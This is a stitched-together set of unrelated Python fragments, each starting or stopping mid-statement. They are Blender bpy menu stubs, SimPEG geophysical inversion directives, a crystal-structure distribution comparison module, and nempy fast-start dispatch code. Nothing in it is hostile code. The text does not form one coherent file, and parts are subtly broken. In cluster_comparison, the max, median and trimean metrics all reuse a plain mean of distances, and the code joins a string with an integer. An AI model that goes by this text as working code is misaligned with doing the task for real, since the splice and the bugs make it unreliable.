''' pass def prepend(self, draw_func): ''' ''' pass def property_overridable_library_set(self): ''' ''' pass def property_unset(self): ''' ''' pass def remove(self, draw_func): ''' ''' pass def type_recast(self): ''' ''' pass def values(self): ''' ''' pass class SEQUENCER_MT_add(bpy_types.Menu, bpy_types._GenericUI): bl_label = None ''' ''' bl_rna = None ''' ''' bl_translation_context = None ''' ''' id_data = None ''' ''' def append(self, draw_func): ''' ''' pass def as_pointer(self): ''' ''' pass def bl_rna_get_subclass(self): ''' ''' pass def bl_rna_get_subclass_py(self): ''' ''' pass def draw(self, context): ''' ''' pass def draw_collapsible(self, context, layout): ''' ''' pass def draw_preset(self, _context): ''' ''' pass def driver_add(self): ''' ''' pass def driver_remove(self): ''' ''' pass def get(self): ''' ''' pass def is_extended(self): ''' ''' pass def is_property_hidden(self): ''' ''' pass def is_property_overridable_library(self): ''' ''' pass def is_property_readonly(self): ''' ''' pass def is_property_set(self): ''' ''' pass def items(self): ''' ''' pass def keyframe_delete(self): ''' ''' pass def keyframe_insert(self): ''' ''' pass def keys(self): ''' ''' pass def path_from_id(self): ''' ''' pass def path_menu(self, searchpaths, operator, props_default, prop_filepath, filter_ext, filter_path, display_name, add_operator): ''' ''' pass def path_resolve(self): ''' ''' pass def pop(self): ''' ''' pass def prepend(self, draw_func): ''' ''' pass def property_overridable_library_set(self): ''' ''' pass def property_unset(self): ''' ''' pass def remove(self, draw_func): ''' ''' pass def type_recast(self): ''' ''' pass def values(self): ''' ''' pass class SEQUENCER_MT_add_effect(bpy_types.Menu, bpy_types._GenericUI): bl_label = None ''' ''' bl_rna = None ''' ''' id_data = None ''' ''' def append(self, draw_func): ''' ''' pass def as_pointer(self): ''' ''' pass def bl_rna_get_subclass(self): ''' ''' pass def bl_rna_get_subclass_py(self): ''' ''' pass def draw(self, context): ''' ''' pass def draw_collapsible(self, context, layout): ''' ''' pass def draw_preset(self, _context): ''' ''' pass def driver_add(self): ''' ''' pass def driver_remove(self): ''' ''' pass def get(self): ''' ''' pass def is_extended(self): ''' ''' pass def is_property_hidden(self): ''' ''' pass def is_property_overridable_library(self): ''' ''' pass def is_property_readonly(self): ''' ''' pass def is_property_set(self): ''' ''' pass def items(self): ''' ''' pass def keyframe_delete(self): ''' ''' pass def keyframe_insert(self): ''' ''' pass def keys(self): ''' ''' pass def path_from_id(self): ''' ''' pass def path_menu(self, searchpaths, operator, props_default, prop_filepath, filter_ext, filter_path, display_name, add_operator): ''' ''' pass def path_resolve(self): ''' ''' pass def pop(self): ''' ''' pass def prepend(self, draw_func): ''' ''' pass def property_overridable_library_set(self): ''' ''' pass def property_unset(self): ''' ''' pass def remove(self, draw_func): ''' ''' pass def type_recast(self): ''' ''' pass def values(self): ''' ''' pass class SEQUENCER_MT_add_empty(bpy_types.Menu, bpy_types._GenericUI): bl_label = None ''' ''' bl_rna = None ''' ''' id_data = None ''' ''' def append(self, draw_func): ''' ''' pass def as_pointer(self): ''' ''' pass def bl_rna_get_subclass(self): ''' ''' pass def bl_rna_get_subclass_py(self): ''' ''' pass def draw(self, _context): ''' ''' pass def draw_collapsible(self, context, layout): ''' ''' pass def draw_preset(self, _context): ''' ''' pass def driver_add(self): ''' ''' pass def driver_remove(self): ''' ''' pass def get(self): ''' ''' pass def is_extended(self): ''' ''' pass def is_property_hidden(self): ''' ''' pass def is_property_overridable_library(self): ''' ''' pass def is_property_readonly(self): ''' ''' pass def is_property_set(self): ''' ''' pass def items(self): ''' ''' pass def keyframe_delete(self): ''' ''' pass def keyframe_insert(self): ''' ''' pass def keys(self): ''' ''' pass def path_from_id(self): ''' ''' pass def path_menu(self, searchpaths, operator, props_default, prop_filepath, filter_ext, filter_path, display_name, add_operator): ''' ''' pass def path_resolve(self): ''' ''' pass def pop(self): ''' ''' pass def prepend(self, draw_func): ''' ''' pass def property_overridable_library_set(self): ''' ''' pass def property_unset(self): ''' ''' pass def remove(self, draw_func): ''' ''' pass def type_recast(self): ''' ''' pass def values(self): ''' ''' pass class SEQUENCER_MT_add_transitions(bpy_types.Menu, bpy_types._GenericUI): bl_label = None ''' ''' bl_rna = None ''' ''' id_data = None ''' ''' def append(self, draw_func): ''' ''' pass def as_pointer(self): ''' ''' pass def bl_rna_get_subclass(self): ''' ''' pass def bl_rna_get_subclass_py(self): ''' ''' pass def draw(self, context): ''' ''' pass def draw_collapsible(self, context, layout): ''' ''' pass def draw_preset(self, _context): ''' ''' pass def driver_add(self): ''' ''' pass def driver_remove(self): ''' ''' pass def get(self): ''' ''' pass def is_extended(self): ''' ''' pass def is_property_hidden(self): ''' ''' pass def is_property_overridable_library(self): ''' ''' pass def is_property_readonly(self): ''' ''' pass def is_property_set(self): ''' ''' pass def items(self): ''' ''' pass def keyframe_delete(self): ''' ''' pass def keyframe_insert(self): ''' ''' pass def keys(self): ''' ''' pass def path_from_id(self): ''' ''' pass def path_menu(self, searchpaths, operator, props_default, prop_filepath, filter_ext, filter_path, display_name, add_operator): ''' ''' pass def path_resolve(self): ''' ''' pass def pop(self): ''' ''' pass def prepend(self, draw_func): ''' ''' pass def property_overridable_library_set(self): ''' ''' pass def property_unset(self): ''' ''' pass def remove(self, draw_func): ''' ''' pass def type_recast(self): ''' ''' pass def values(self): ''' ''' pass class SEQUENCER_MT_change(bpy_types.Menu, bpy_types._GenericUI): bl_label = None ''' ''' bl_rna = None ''' ''' id_data = None ''' ''' def append(self, draw_func): ''' ''' pass def as_pointer(self): ''' ''' pass def bl_rna_get_subclass(self): ''' ''' pass def bl_rna_get_subclass_py(self): ''' ''' pass def draw(self, context): ''' ''' pass def draw_collapsible(self, context, layout): ''' ''' pass def draw_preset(self, _context): ''' ''' pass def driver_add(self): ''' ''' pass def driver_remove(self): ''' ''' pass def get(self):
self.chi0_ratio = self.chi0_ratio * np.ones(ndm) else: self.chi0_ratio = self.dmisfit.multipliers m = self.invProb.model dm_eigenvalue_list = [] for j, dm in enumerate(self.dmisfit.objfcts): dm_eigenvalue_list += [eigenvalue_by_power_iteration(dm, m)] self.chi0 = self.chi0_ratio / np.r_[dm_eigenvalue_list] self.chi0 = self.chi0 / np.sum(self.chi0) self.dmisfit.multipliers = self.chi0 if self.verbose: print("Scale Multipliers: ", self.dmisfit.multipliers) class JointScalingSchedule(InversionDirective): """ For multiple data misfits only: rebalance each data misfit term during the inversion when some datasets are fit, and others not using the ratios of current misfits and their respective target. It implements the strategy described in https://doi.org/10.1093/gji/ggaa378. """ verbose = False warmingFactor = 1.0 mode = 1 chimax = 1e10 chimin = 1e-10 update_rate = 1 def initialize(self): if ( getattr(self.dmisfit, "objfcts", None) is None or len(self.dmisfit.objfcts) == 1 ): raise TypeError("JointScalingSchedule only applies to joint inversion") targetclass = np.r_[ [ isinstance(dirpart, MultiTargetMisfits) for dirpart in self.inversion.directiveList.dList ] ] if ~np.any(targetclass): self.DMtarget = None else: self.targetclass = np.where(targetclass)[0][-1] self.DMtarget = self.inversion.directiveList.dList[ self.targetclass ].DMtarget if self.verbose: print("Initial data misfit scales: ", self.dmisfit.multipliers) def endIter(self): self.dmlist = self.inversion.directiveList.dList[self.targetclass].dmlist if np.any(self.dmlist < self.DMtarget): self.mode = 2 else: self.mode = 1 if self.opt.iter > 0 and self.opt.iter % self.update_rate == 0: if self.mode == 2: if np.all(np.r_[self.dmisfit.multipliers] > self.chimin) and np.all( np.r_[self.dmisfit.multipliers] < self.chimax ): indx = self.dmlist > self.DMtarget if np.any(indx): multipliers = self.warmingFactor * np.median( self.DMtarget[~indx] / self.dmlist[~indx] ) if np.sum(indx) == 1: indx = np.where(indx)[0][0] self.dmisfit.multipliers[indx] *= multipliers self.dmisfit.multipliers /= np.sum(self.dmisfit.multipliers) if self.verbose: print("Updating scaling for data misfits by ", multipliers) print("New scales:", self.dmisfit.multipliers) class TargetMisfit(InversionDirective): """ ... note:: Currently this target misfit is not set up for joint inversion. Check out MultiTargetMisfits """ chifact = 1.0 phi_d_star = None @property def target(self): if getattr(self, "_target", None) is None: # the factor of 0.5 is because we do phid = 0.5*||dpred - dobs||^2 if self.phi_d_star is None: nD = 0 for survey in self.survey: nD += survey.nD self.phi_d_star = 0.5 * nD self._target = self.chifact * self.phi_d_star return self._target @target.setter def target(self, val): self._target = val def endIter(self): if self.invProb.phi_d < self.target: self.opt.stopNextIteration = True self.print_final_misfit() def print_final_misfit(self): if self.opt.print_type == "ubc": self.opt.print_target = ( ">> Target misfit: %.1f (# of data) is achieved" ) % (self.target * self.invProb.opt.factor) class MultiTargetMisfits(InversionDirective): WeightsInTarget = 0 verbose = False # Chi factor for Geophsyical Data Misfit chifact = 1.0 phi_d_star = None # Chifact for Clustering/Smallness TriggerSmall = True chiSmall = 1.0 phi_ms_star = None # Tolerance for parameters difference with their priors TriggerTheta = False # deactivated by default ToleranceTheta = 1.0 distance_norm = np.inf AllStop = False DM = False # geophysical fit condition CL = False # petrophysical fit condition DP = False # parameters difference with their priors condition def initialize(self): self.dmlist = np.r_[[dmis(self.invProb.model) for dmis in self.dmisfit.objfcts]] if getattr(self.invProb.reg.objfcts[0], "objfcts", None) is not None: smallness = np.r_[ [ ( np.r_[ i, j, ( isinstance( regpart, PGIwithNonlinearRelationshipsSmallness, ) or isinstance(regpart, PGIsmallness) ), ] ) for i, regobjcts in enumerate(self.invProb.reg.objfcts) for j, regpart in enumerate(regobjcts.objfcts) ] ] if smallness[smallness[:, 2] == 1][:, :2].size == 0: warnings.warn( "There is no PGI regularization. Smallness target is turned off (TriggerSmall flag)" ) self.smallness = -1 self.pgi_smallness = None else: self.smallness = smallness[smallness[:, 2] == 1][:, :2][0] self.pgi_smallness = self.invProb.reg.objfcts[ self.smallness[0] ].objfcts[self.smallness[1]] if self.debug: print( type( self.invProb.reg.objfcts[self.smallness[0]].objfcts[ self.smallness[1] ] ) ) self._regmode = 1 else: smallness = np.r_[ [ ( np.r_[ j, ( isinstance( regpart, PGIwithNonlinearRelationshipsSmallness, ) or isinstance(regpart, PGIsmallness) ), ] ) for j, regpart in enumerate(self.invProb.reg.objfcts) ] ] if smallness[smallness[:, 1] == 1][:, :1].size == 0: if self.TriggerSmall: warnings.warn( "There is no PGI regularization. Smallness target is turned off (TriggerSmall flag)." ) self.TriggerSmall = False self.smallness = -1 else: self.smallness = smallness[smallness[:, 1] == 1][:, :1][0] self.pgi_smallness = self.invProb.reg.objfcts[self.smallness[0]] if self.debug: print(type(self.invProb.reg.objfcts[self.smallness[0]])) self._regmode = 2 @property def DMtarget(self): if getattr(self, "_DMtarget", None) is None: # the factor of 0.5 is because we do phid = 0.5*|| dpred - dobs||^2 if self.phi_d_star is None: # Check if it is a ComboObjective if isinstance(self.dmisfit, ComboObjectiveFunction): self.phi_d_star = np.r_[[0.5 * survey.nD for survey in self.survey]] else: self.phi_d_star = np.r_[[0.5 * self.survey.nD]] self._DMtarget = self.chifact * self.phi_d_star return self._DMtarget @DMtarget.setter def DMtarget(self, val): self._DMtarget = val @property def CLtarget(self): if not getattr(self.pgi_smallness, "approx_eval", True): # if nonlinear prior, compute targer numerically at each GMM update samples, _ = self.pgi_smallness.gmm.sample( len(self.pgi_smallness.gmm.cell_volumes) ) self.phi_ms_star = self.pgi_smallness( mkvc(samples), externalW=self.WeightsInTarget ) self._CLtarget = self.chiSmall * self.phi_ms_star elif getattr(self, "_CLtarget", None) is None: # the factor of 0.5 is because we do phid = 0.5*|| dpred - dobs||^2 if self.phi_ms_star is None: # Expected value is number of active cells * number of physical # properties self.phi_ms_star = 0.5 * len(self.invProb.model) self._CLtarget = self.chiSmall * self.phi_ms_star return self._CLtarget @property def CLnormalizedConstant(self): if ~self.WeightsInTarget: return 1.0 elif np.any(self.smallness == -1): return np.sum( sp.csr_matrix.diagonal(self.invProb.reg.objfcts[0].W) ** 2.0 ) / len(self.invProb.model) else: return np.sum(sp.csr_matrix.diagonal(self.pgi_smallness.W) ** 2.0) / len( self.invProb.model ) @CLtarget.setter def CLtarget(self, val): self._CLtarget = val def phims(self): if np.any(self.smallness == -1): return self.invProb.reg.objfcts[0](self.invProb.model) else: return ( self.pgi_smallness(self.invProb.model, externalW=self.WeightsInTarget,) / self.CLnormalizedConstant ) def ThetaTarget(self): maxdiff = 0.0 for i in range(self.invProb.reg.gmm.n_components): meandiff = np.linalg.norm( (self.invProb.reg.gmm.means_[i] - self.invProb.reg.gmmref.means_[i]) / self.invProb.reg.gmmref.means_[i], ord=self.distance_norm, ) maxdiff = np.maximum(maxdiff, meandiff) if ( self.invProb.reg.gmm.covariance_type == "full" or self.invProb.reg.gmm.covariance_type == "spherical" ): covdiff = np.linalg.norm( ( self.invProb.reg.gmm.covariances_[i] - self.invProb.reg.gmmref.covariances_[i] ) / self.invProb.reg.gmmref.covariances_[i], ord=self.distance_norm, ) else: covdiff = np.linalg.norm( ( self.invProb.reg.gmm.covariances_ - self.invProb.reg.gmmref.covariances_ ) / self.invProb.reg.gmmref.covariances_, ord=self.distance_norm, ) maxdiff = np.maximum(maxdiff, covdiff) pidiff = np.linalg.norm( [ ( self.invProb.reg.gmm.weights_[i] - self.invProb.reg.gmmref.weights_[i] ) / self.invProb.reg.gmmref.weights_[i] ], ord=self.distance_norm, ) maxdiff = np.maximum(maxdiff, pidiff) return maxdiff def endIter(self): self.AllStop = False self.DM = False self.CL = True self.DP = True self.dmlist = np.r_[[dmis(self.invProb.model) for dmis in self.dmisfit.objfcts]] self.targetlist = np.r_[ [dm < tgt for dm, tgt in zip(self.dmlist, self.DMtarget)] ] if np.all(self.targetlist): self.DM = True if self.TriggerSmall and np.any(self.smallness != -1): if self.phims() > self.CLtarget: self.CL = False if self.TriggerTheta: if self.ThetaTarget() > self.ToleranceTheta: self.DP = False self.AllStop = self.DM and self.CL and self.DP if self.verbose: message = "geophys. misfits: " + "; ".join( map( str, [ "{0} (target {1} [{2}])".format(val, tgt, cond) for val, tgt, cond in zip( np.round(self.dmlist, 1), np.round(self.DMtarget, 1), self.targetlist, ) ], ) ) if self.TriggerSmall: message += " | smallness misfit: {0:.1f} (target: {1:.1f} [{2}])".format( self.phims(), self.CLtarget, self.CL ) if self.TriggerTheta: message += " | GMM parameters within tolerance: {}".format(self.DP) print(message) if self.AllStop: self.opt.stopNextIteration = True if self.verbose: print("All targets have been reached") class SaveEveryIteration(InversionDirective): """SaveEveryIteration This directive saves an array at each iteration. The default directory is the current directory and the models are saved as ``InversionModel-YYYY-MM-DD-HH-MM-iter.npy`` """ directory = properties.String("directory to save results in", default=".") name = properties.String( "root of the filename to be saved", default="InversionModel" ) @properties.validator("directory") def _ensure_abspath(self, change): val = change["value"] fullpath = os.path.abspath(os.path.expanduser(val)) if not os.path.isdir(fullpath): os.mkdir(fullpath) @property def fileName(self): if getattr(self, "_fileName", None) is None: from datetime import datetime self._fileName = "{0!s}-{1!s}".format( self.name, datetime.now().strftime("%Y-%m-%d-%H-%M") ) return self._fileName class SaveModelEveryIteration(SaveEveryIteration): """SaveModelEveryIteration This directive saves the model as a numpy array at each iteration. The default directory is the current directoy and the models are saved as ``InversionModel-YYYY-MM-DD-HH-MM-iter.npy`` """ def initialize(self): print( "SimPEG.SaveModelEveryIteration will save your models as: " "'{0!s}###-{1!s}.npy'".format(self.directory + os.path.sep, self.fileName) ) def endIter(self): np.save( "{0!s}{1:03d}-{2!s}".format( self.directory + os.path.sep, self.opt.iter, self.fileName ), self.opt.xc, ) class SaveOutputEveryIteration(SaveEveryIteration): """SaveOutputEveryIteration""" header = None save_txt = True beta = None phi_d = None phi_m = None phi_m_small = None phi_m_smooth_x = None phi_m_smooth_y = None phi_m_smooth_z = None phi = None def initialize(self): if self.save_txt is True: print( "SimPEG.SaveOutputEveryIteration will save your inversion " "progress as: '###-{0!s}.txt'".format(self.fileName) ) f = open(self.fileName + ".txt", "w") self.header = " # beta phi_d phi_m phi_m_small phi_m_smoomth_x phi_m_smoomth_y phi_m_smoomth_z phi\n" f.write(self.header) f.close() # Create a list of each self.beta = [] self.phi_d = [] self.phi_m = [] self.phi_m_small = [] self.phi_m_smooth_x = [] self.phi_m_smooth_y = [] self.phi_m_smooth_z = [] self.phi = [] def endIter(self): phi_s, phi_x, phi_y, phi_z = 0, 0,
be sampled several times). Returns: list of Kabsch RMSDs """ distances = self._randomized_rmsd( self.structure_list, self.structure_list, iterations, self.njobs ) return distances @staticmethod def _properties_test_statistics(property_list): """ Returns various descriptive statistics for an array. Inspired by what <NAME> (https://github.com/EricSchles) presented in the NYC data science meetup Args: property_list (list): list of numeric values for which descriptive statistics will be computed Returns: result_dict (dict): dictionary with descriptive statistics """ property_list = np.array(property_list) q1 = np.percentile(property_list, 25) q3 = np.percentile(property_list, 75) agostino = normaltest(property_list) result_dict = { "trimean": Statistics.trimean(property_list), "midhinge": Statistics.midhinge(property_list), "interquartile_mean": Statistics.interquartile_mean(property_list), "value_range": Statistics.val_range(property_list), "mid_range": Statistics.mid_range(property_list), "minimum": np.min(property_list), "maximum": np.max(property_list), "median": np.median(property_list), "stdev": np.std(property_list), "geometric_mean": gmean(property_list), "mean": np.mean(property_list), "interquartile_range": q3 - q1, "quartile_1": q1, "quartile_3": q3, "MAD": median_absolute_deviation(property_list), "kurtosis": kurtosis(property_list), "mode": mode(property_list), "variation": variation(property_list), "skew": skew(property_list), "D_Agostino_statistic": agostino[0], "D_Agostino_p_value": agostino[1], } return result_dict def properties_test_statistics(self): """ Returns: dictionary with descriptive statistics for each feature column. """ if self.list_of_list_mode: # concurrently loop of the different feature columns. with concurrent.futures.ProcessPoolExecutor( max_workers=self.njobs ) as executor: logger.debug("looping over feature columns for properties statistics") out_dict = {} for i, results_dict in enumerate( executor.map( DistStatistic._properties_test_statistics, self.property_list ) ): logger.debug("Creating statistics for %s", self.feature_names[i]) self.properties_statistics[self.feature_names[i]] = results_dict out_dict[self.feature_names[i]] = results_dict return out_dict else: out_dict = {} results_dict = DistStatistic._properties_test_statistics(self.property_list) self.properties_statistics[self.feature_names] = results_dict out_dict[self.feature_names] = results_dict return out_dict class DistComparison(Statistics): """ Comparator to compare the difference or similarity between two distributions. The idea is here to save the test statistics to the object such that we can then implement some dunder methods to compare different Comparator objects and e.g. find out which distributions are most similar to each other. """ def __init__( self, structure_list_1: list = None, structure_list_2: list = None, property_list_1: [list, pd.DataFrame] = None, property_list_2: [list, pd.DataFrame] = None, njobs: int = 2, ): """ Args: structure_list_1 (list): structure_list_2 (list): property_list_1 (list or pd.DataFrame): property_list_2 (list or pd.DataFrame): """ self.structure_list_1 = structure_list_1 self.structure_list_2 = structure_list_2 self.property_list_1 = property_list_1 self.property_list_2 = property_list_2 self.feature_names = [] self.qq_statistics = {} self.properties_statistics = {} self.rmsds = None self.jaccards = None self.random_structure_property = {} self.njobs = njobs if (property_list_1 is not None) and (property_list_2 is not None): if not isinstance(self.property_list_1, type(self.property_list_2)): raise ValueError("The two property inputs must be of same type") # Check if input is a dataframe. If this is the case, extract the column names # and convert it to list of lists if isinstance(property_list_1, pd.DataFrame): logger.debug( "Input seems to be a dataframe, will only use numeric data" ) self.list_of_list_mode = True self.property_list_1 = self.property_list_1._get_numeric_data() self.feature_names = self.property_list_1.columns.values logger.debug("will use %s as feature names", self.feature_names) _tmp_property_list_1 = [] for feature in self.feature_names: _tmp_property_list_1.append( self.property_list_1[feature].values.astype(np.float32).tolist() ) self.property_list_1 = _tmp_property_list_1 _tmp_property_list_2 = [] self.property_list_2 = self.property_list_2._get_numeric_data() for feature in self.feature_names: _tmp_property_list_2.append( self.property_list_2[feature].values.astype(np.float32).tolist() ) self.property_list_2 = _tmp_property_list_2 assert len(self.property_list_1) == len(self.feature_names) assert len(self.property_list_2) == len(self.feature_names) else: # Check if the input is a list of list (i.e. multiple feature columns) # if this is the case, we have to iterate over the lists to compute the test statistics if all(isinstance(i, list) for i in property_list_1): if all(isinstance(i, list) for i in property_list_2): self.list_of_list_mode = True self.feature_names = [ "_".join(["feature", i]) for i in range(len(self.property_list_1)) ] else: logger.error( "One input seems to be a list of list whereas the other one is not. " "The property lists must be both of the same type. Please check your inputs." ) else: if all(isinstance(i, list) for i in property_list_2): logger.error( "One input seems to be a list of list whereas the other one is not. " "The property lists must be both of the same type. Please check your inputs." ) else: self.feature_names.append("feature_0") self.list_of_list_mode = False def __repr__(self): return "DistComparison" def __len__(self): return ( len(self.structure_list_1) + len(self.structure_list_2) + len(self.property_list_1) + len(self.property_list_2) ) @classmethod def from_folders( cls, folder_1: str, folder_2: str, property_list_1: [list, pd.DataFrame] = None, property_list_2: [list, pd.DataFrame] = None, extension="cif", njobs: int = 2, ): """Constructor method for a DistComparison object""" sl_1 = get_structure_list(folder_1, extension) sl_2 = get_structure_list(folder_2, extension) return cls(sl_1, sl_2, property_list_1, property_list_2, njobs=njobs) def randomized_graphs(self, iterations: int = 5000) -> list: """ Returns iterations times the Jaccard distance between structure graph of two randomly chosen structures Args: iterations (int): number of comparisons (sampling works with replacement, i.e. the same pair might be sampled several times). Returns: list of jaccard distances """ jaccards = self._randomized_graphs( self.structure_list_1, self.structure_list_2, iterations, self.njobs ) self.jaccards = jaccards return jaccards def randomized_structure_property( self, feature: str = "density", iterations: int = 5000 ) -> list: """ Returns iterations times the Euclidean distance between two randomly chosen structures Args: feature (str): property that is used for the structure comparisons, available options are density, num_sites, volume. Default is density. iterations (int): number of comparisons (sampling works with replacement, i.e. the same pair might be sampled several times). Returns: list of property distances """ distances = self._randomized_structure_property( self.structure_list_1, self.structure_list_2, feature, iterations, self.njobs, ) self.random_structure_property[feature] = distances return distances def randomized_rmsd(self, iterations: int = 5000) -> list: """ Returns iterations times the Kabsch RMSD between two randomly chosen structures Args: iterations (int): number of comparisons (sampling works with replacement, i.e. the same pair might be sampled several times). Returns: list of Kabsch RMSDs """ distances = self._randomized_rmsd( self.structure_list_1, self.structure_list_2, iterations, self.njobs ) self.rmsds = distances return distances def cluster_comparison(self, n_runs: int = 4): """ Performs distance measurements based on (optimal) knn clustering. The following metrics are computed: - Optimal clustering on both property distributions based on a Shilouethette criterion - Clustering on the other distribution with the same number of clusters, distance between the centroids - max min (d(x_i, c_j)) and max min (d(x_i, c_i)), the maximum minimal distance between the data points and the cluster centroids - mean min (d(x_i, c_j)) and mean min (d(x_i, c_i)), the mean minimal distance between the data points and the cluster centroids - median min (d(x_i, c_j)) and median min (d(x_i, c_i)), the median minimal distance between the data points and the cluster centroids - trimean min (d(x_i, c_j)) and trimean min (d(x_i, c_i)), the trimean minimal distance between the data points and the cluster centroids - min min (d(x_i, c_j)) and min min (d(x_i, c_i)), the minimum minimal distance between the data points and the cluster centroids Ideally, one would want the outer metrics to be similar to the inner metrics. To avoid influences from from different scales/units, the data is standardized by default. As the outcome of the knn clusterings is randomized, especically if the clustering is bad, we bootstrap the metrics by default. Returns: dict with the metrics (floats) """ from sklearn.preprocessing import StandardScaler from scipy.spatial import KDTree n_cluster_1s = [] n_cluster_2s = [] k_d_1_1s_min = [] k_d_1_2s_min = [] k_d_2_2s_min = [] k_d_2_1s_min = [] k_d_1_1s_max = [] k_d_1_2s_max = [] k_d_2_2s_max = [] k_d_2_1s_max = [] k_d_1_1s_mean = [] k_d_1_2s_mean = [] k_d_2_2s_mean = [] k_d_2_1s_mean = [] k_d_1_1s_median = [] k_d_1_2s_median = [] k_d_2_2s_median = [] k_d_2_1s_median = [] k_d_1_1s_trimean = [] k_d_1_2s_trimean = [] k_d_2_2s_trimean = [] k_d_2_1s_trimean = [] distance_clustering_1s = [] distance_clustering_2s = [] for i in tqdm(range(n_runs)): knn_1, n_cluster_1 = self.optimal_knn( np.transpose(np.array(self.property_list_1)) ) n_cluster_1s.append(n_cluster_1) sc = StandardScaler() tree_1 = KDTree(knn_1.cluster_centers_) k_d_1_1, _ = tree_1.query( sc.fit_transform(np.transpose(np.array(self.property_list_1))), k=1 ) k_d_1_2, _ = tree_1.query( sc.fit_transform(np.transpose(np.array(self.property_list_2))), k=1 ) k_d_1_1s_min.append(np.min(k_d_1_1)) k_d_1_2s_min.append(np.min(k_d_1_2)) k_d_1_1s_max.append(np.max(k_d_1_1)) k_d_1_2s_max.append(np.max(k_d_1_2)) k_d_1_1s_mean.append(np.mean(k_d_1_1)) k_d_1_2s_mean.append(np.mean(k_d_1_2)) k_d_1_1s_median.append(np.median(k_d_1_1)) k_d_1_2s_median.append(np.median(k_d_1_2)) k_d_1_1s_trimean.append(self.trimean(k_d_1_1)) k_d_1_2s_trimean.append(self.trimean(k_d_1_2)) kmeans_1 = KMeans(n_clusters=n_cluster_1).fit( sc.fit_transform(np.transpose(np.array(self.property_list_2))) ) distance_clustering_1 = self.euclidean_distance( knn_1.cluster_centers_, kmeans_1.cluster_centers_ ) distance_clustering_1s.append(distance_clustering_1) knn_2, n_cluster_2 = self.optimal_knn( np.transpose(np.array(self.property_list_2)) ) n_cluster_2s.append(n_cluster_2) tree_2 = KDTree(knn_2.cluster_centers_) k_d_2_2, _ = tree_2.query( sc.fit_transform(np.transpose(np.array(self.property_list_2))), k=1 ) k_d_2_1, _ = tree_2.query( sc.fit_transform(np.transpose(np.array(self.property_list_1))), k=1 ) k_d_2_2s_min.append(np.min(k_d_2_2)) k_d_2_1s_min.append(np.min(k_d_2_1)) k_d_2_2s_max.append(np.max(k_d_2_2)) k_d_2_1s_max.append(np.max(k_d_2_1)) k_d_2_2s_mean.append(np.mean(k_d_2_2)) k_d_2_1s_mean.append(np.mean(k_d_2_1)) k_d_2_2s_median.append(np.median(k_d_2_2)) k_d_2_1s_median.append(np.median(k_d_2_1)) k_d_2_2s_trimean.append(self.trimean(k_d_2_2)) k_d_2_1s_trimean.append(self.trimean(k_d_2_1)) kmeans_2 = KMeans(n_clusters=n_cluster_2).fit( sc.fit_transform(np.transpose(np.array(self.property_list_1))) ) distance_clustering_2 = self.euclidean_distance( knn_2.cluster_centers_, kmeans_2.cluster_centers_ ) distance_clustering_2s.append(distance_clustering_2) result_dict = { "mean_n_cluster_1": np.mean(n_cluster_1s), "mean_n_cluster_2": np.mean(n_cluster_2s), "mean_euclidean_1": np.mean(distance_clustering_1s), "mean_euclidean_2": np.mean(distance_clustering_2s), "mean_max_min_inner_1": np.mean(k_d_1_1), "mean_max_min_outer_1": np.mean(k_d_1_2), "mean_max_min_inner_2": np.mean(k_d_2_2), "mean_max_min_outer_2": np.mean(k_d_2_1), "mean_mean_min_inner_1": np.mean(k_d_1_1), "mean_mean_min_outer_1": np.mean(k_d_1_2), "mean_mean_min_inner_2": np.mean(k_d_2_2), "mean_mean_min_outer_2": np.mean(k_d_2_1), "mean_median_min_inner_1": np.mean(k_d_1_1), "mean_median_min_outer_1": np.mean(k_d_1_2), "mean_median_min_inner_2": np.mean(k_d_2_2), "mean_median_min_outer_2": np.mean(k_d_2_1), "mean_trimean_min_inner_1": np.mean(k_d_1_1), "mean_trimean_min_outer_1": np.mean(k_d_1_2),
1.0 5.0 .. ... ... ... ... ... ... 69 VPGS5 0 5.0 3.0 0.0 49.0 70 VPGS6 0 5.0 3.0 0.0 49.0 71 W/HOE#1 0 5.0 0.0 0.0 160.0 72 W/HOE#2 0 5.0 0.0 0.0 160.0 73 YABULU 0 5.0 6.0 6.0 83.0 <BLANKLINE> [74 rows x 6 columns] Returns ------- pd.DataFrame ================ ======================================== Columns: Description: unit unique identifier for units, (as `str`) \n end_mode the fast start mode the unit will end \n the dispatch interval in, (as `np.int64`) time_in_end_mode the amount of time the unit will have \n spend in the end mode at the end of the \n dispatch interval, (as `np.float64`) mode_two_length the length the units mode two, in minutes \n (as `np.float64`) mode_four_length the length the units mode four, in minutes \n (as `np.float64`) min_loading the mininum opperating level of the unit \n during mode three, in MW, (as `no.float64`) ================ ======================================== """ profiles = self._get_fast_start_profiles(unconstrained_dispatch=unconstrained_dispatch) return profiles.loc[:, ['unit', 'end_mode', 'time_in_end_mode', 'mode_two_length', 'mode_four_length', 'min_loading']] def _get_fast_start_profiles(self, unconstrained_dispatch=None): fast_start_profiles = self.fast_start_profiles fast_start_profiles = an.map_aemo_column_names_to_nempy_names(fast_start_profiles) fast_start_profiles = self._commit_fast_start_units_in_mode_zero_if_they_have_non_zero_unconstrained_dispatch( fast_start_profiles, unconstrained_dispatch) fast_start_profiles = self._fast_start_calc_end_interval_state(fast_start_profiles, self.dispatch_interval) return fast_start_profiles @staticmethod def _commit_fast_start_units_in_mode_zero_if_they_have_non_zero_unconstrained_dispatch(fast_start_profiles, unconstrained_dispatch): if unconstrained_dispatch is not None: unconstrained_dispatch = unconstrained_dispatch[unconstrained_dispatch['service'] == 'energy'] fast_start_profiles = pd.merge(fast_start_profiles, unconstrained_dispatch, on='unit') fast_start_profiles['current_mode'] = np.where((fast_start_profiles['current_mode'] == 0) & (fast_start_profiles['dispatch'] > 0.0), 1, fast_start_profiles['current_mode']) return fast_start_profiles @staticmethod def _fast_start_calc_end_interval_state(fast_start_profile, dispatch_interval): def clac_mode_length(data): if data['previous_mode'] == 1: return data['mode_one_length'] elif data['previous_mode'] == 2: return data['mode_two_length'] elif data['previous_mode'] == 3: return data['mode_three_length'] elif data['previous_mode'] == 4: return data['mode_four_length'] else: return np.inf fast_start_profile['previous_mode'] = fast_start_profile['current_mode'] fast_start_profile['current_mode_length'] = fast_start_profile.apply(lambda x: clac_mode_length(x), axis=1) fast_start_profile['time_in_current_mode_at_end'] = \ fast_start_profile['time_in_current_mode'] + dispatch_interval fast_start_profile['end_mode'] = np.where(fast_start_profile['time_in_current_mode_at_end'] > fast_start_profile['current_mode_length'], fast_start_profile['current_mode'] + 1, fast_start_profile['current_mode']) fast_start_profile['time_in_end_mode'] = np.where( fast_start_profile['end_mode'] != fast_start_profile['current_mode'], fast_start_profile['time_in_current_mode_at_end'] - fast_start_profile['current_mode_length'], fast_start_profile['time_in_current_mode_at_end']) 